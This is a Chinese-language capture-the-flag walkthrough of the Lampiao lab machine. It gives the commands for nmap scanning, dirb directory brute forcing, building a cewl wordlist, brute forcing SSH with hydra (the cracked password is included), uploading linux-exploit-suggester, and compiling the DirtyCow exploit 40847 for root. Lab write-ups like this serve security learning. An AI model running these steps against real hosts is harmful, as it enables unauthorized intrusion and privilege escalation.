No.2-红队渗透项目:Lampiao

2024-04-26 885 0

简介

作者:摇光

时间:2024-04-16

座右铭:路虽远,行则将至,事虽难,做则必成。

请注意:

对于所有这些计算机,我已经使用VMware运行下载的计算机。我将使用Kali Linux作为解决该CTF的攻击者机器。这里使用的技术仅用于学习教育目的,如果列出的技术用于其他任何目标,我概不负责。

一、信息收集

在VM中获取攻击目标的ip地址,用nmap获取目标主机的ip地址

nmap -sP 192.168.111.0/24

No.2-红队渗透项目:Lampiao插图

目标主机的IP地址:192.168.111.129

nmap扫描发现目标主机的端口及服务(进行目标主机全端口扫描)

No.2-红队渗透项目:Lampiao插图1

发现开放了22、80、1898端口,访问:

http://192.168.111.129:1898/

No.2-红队渗透项目:Lampiao插图2

查看http://192.168.111.129:1898/?q=node/2/ 发现音频audio.m4a和图片qrc.png

No.2-红队渗透项目:Lampiao插图3

在本机浏览器访问http://192.168.111.129:1898/audio.m4a

No.2-红队渗透项目:Lampiao插图4

打开音频,获得用户名:tiago

访问http://192.168.111.129:1898/qrc.png

No.2-红队渗透项目:Lampiao插图5

扫描二维码无有效信息

二、web渗透

爆破下网站目录
dirb http://192.169.111.129:1898

No.2-红队渗透项目:Lampiao插图6

发现robots.txt文件,访问http://192.168.111.129:1898/robots.txt

No.2-红队渗透项目:Lampiao插图7

发现CHANGELOG.txt,访问http://192.168.111.129:1898//CHANGELOG.txt

No.2-红队渗透项目:Lampiao插图8

发现网站版本为:Drupal 7.54

获取密码字典:

cewl:通过爬行网站获取关键信息创建一个密码字典
cewl http://192.168.111.129:1898/?q=node/1 -w dayu.txt

No.2-红队渗透项目:Lampiao插图9

hydra(九头蛇)利用由cewl获取的字典爆破用户密码

hydra -l tiago -P dayu.txt 192.168.111.129 ssh

No.2-红队渗透项目:Lampiao插图10

获得密码: password: Virgulino

ssh进行登录:ssh [email protected] ,查看id,系统内核

No.2-红队渗透项目:Lampiao插图11

发现是低权限用户,需要提权

三、内核提权

谷歌搜索:linux suggest exploit

No.2-红队渗透项目:Lampiao插图12

通过

wget https://raw.githubusercontent.com/mzet-/linux-exploit-suggester/master/linux-exploit-suggester.sh -O les.sh

该命令下载攻击脚本,在这里用代理去下载,速度更快,需要修改host,这里ip地址为wifi的ip地址,端口为7890(全局端口)

No.2-红队渗透项目:Lampiao插图13

这里下载时用proxychains,不然走不出去

No.2-红队渗透项目:Lampiao插图14

利用 python2 -m SimpleHTTPService 1234 开启临时的建议服务器

No.2-红队渗透项目:Lampiao插图15

通过wget在8081端口将攻击脚本上传到目标服务器

No.2-红队渗透项目:Lampiao插图16

对les.sh文件赋予执行权限:使用命令chmod +x

No.2-红队渗透项目:Lampiao插图17

执行les.sh

No.2-红队渗透项目:Lampiao插图18

它的作用是扫描当前底层目录是否有能利用漏洞进行内核提权

扫描后,全部通过测试,发现存在脏牛漏洞(dirtycow 2)可以进行提权

No.2-红队渗透项目:Lampiao插图19

查询40847

No.2-红队渗透项目:Lampiao插图20

谷歌搜索该漏洞利用方法

搜索40847 exploit

No.2-红队渗透项目:Lampiao插图21

解释说明只需把40847提权脚本上传上去,执行该命令进行编译即可

g++ -Wall -pedantic -O2 -std=c++11 -pthread -o dcow 40847.cpp -lutil

将40847文件拷贝到本地

No.2-红队渗透项目:Lampiao插图22

通过wget将40847文件上传到目标服务器

No.2-红队渗透项目:Lampiao插图23

进行编译

No.2-红队渗透项目:Lampiao插图24

获得提权登录密码:dirtyCowFun

ssh登录root用户

No.2-红队渗透项目:Lampiao插图25

查看当前目录,获得flag

No.2-红队渗透项目:Lampiao插图26

flag:9740616875908d91ddcdaa8aea3af366


4A评测 - 免责申明

本站提供的一切软件、教程和内容信息仅限用于学习和研究目的。

不得将上述内容用于商业或者非法用途,否则一切后果请用户自负。

本站信息来自网络,版权争议与本站无关。您必须在下载后的24个小时之内,从您的电脑或手机中彻底删除上述内容。

如果您喜欢该程序,请支持正版,购买注册,得到更好的正版服务。如有侵权请邮件与我们联系处理。敬请谅解!

程序来源网络,不确保不包含木马病毒等危险内容,请在确保安全的情况下或使用虚拟机使用。

侵权违规投诉邮箱:4ablog168#gmail.com(#换成@)

相关文章

webpack打包站点,js文件名批量获取思路
加密对抗靶场enctypt——labs通关
【论文速读】| 注意力是实现基于大语言模型的代码漏洞定位的关键
蓝队技术——Sysmon识别检测宏病毒
内网渗透学习|powershell上线cs
LLM attack中的API调用安全问题及靶场实践

发布评论